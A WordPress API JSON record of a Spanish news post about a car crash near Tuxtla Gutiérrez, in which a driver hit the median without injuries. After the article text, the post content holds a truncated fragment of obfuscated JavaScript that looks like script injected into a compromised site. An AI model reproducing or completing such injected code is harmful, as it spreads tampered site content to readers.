{"id":8891,"date":"2023-03-03T03:14:24","date_gmt":"2023-03-03T03:14:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8891"},"modified":"2023-03-03T03:14:24","modified_gmt":"2023-03-03T03:14:24","slug":"joven-conductor-protagoniza-fuerte-accidente-en-el-tramo-tuxtla-chiapa-de-corzo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8891","title":{"rendered":"Joven conductor protagoniza fuerte accidente en el tramo Tuxtla-Chiapa de Corzo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1677813244544.jpg\" alt=\"\" class=\"wp-image-8892\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1677813244544.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1677813244544-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 2 de marzo del 2023. Tuxtla Gutierrez.- Este jueves el conductor de un Nissan Sentra de color gris  protagoniz\u00f3 un fuerte accidente de tr\u00e1nsito en el tramo Tuxtla-Chiapa de Corzo.Los reportes de tr\u00e1nsito informaron que, el conductor de 25 a\u00f1os de edad conduc\u00eda en este tramo presuntamente a exceso de velocidad en el sentido de Oriente a Poniente y en estado inconveniente.Fue al llegar a la altura de la extinta planta de Biodiesel que perdi\u00f3 el control y choc\u00f3 contra el Camell\u00f3n Central, despu\u00e9s contra los tri\u00e1ngulos y detuvo la marcha.Afortunadamente no hubo personas lesionadas, \u00fanicamente da\u00f1os materiales.El conductor fue puesto a disposici\u00f3n del Ministerio P\u00fablico para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 2 de marzo del 2023. Tuxtla Gutierrez.- Este jueves el conductor de un Nissan Sentra de color gris protagoniz\u00f3 un fuerte accidente de tr\u00e1nsito en el tramo Tuxtla-Chiapa de Corzo.Los reportes de tr\u00e1nsito informaron que, el conductor de 25 a\u00f1os de edad conduc\u00eda en este tramo presuntamente a exceso de velocidad en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8892,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8891","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8891","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8891"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8891\/revisions"}],"predecessor-version":[{"id":8893,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8891\/revisions\/8893"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8892"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8891"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8891"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8891"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}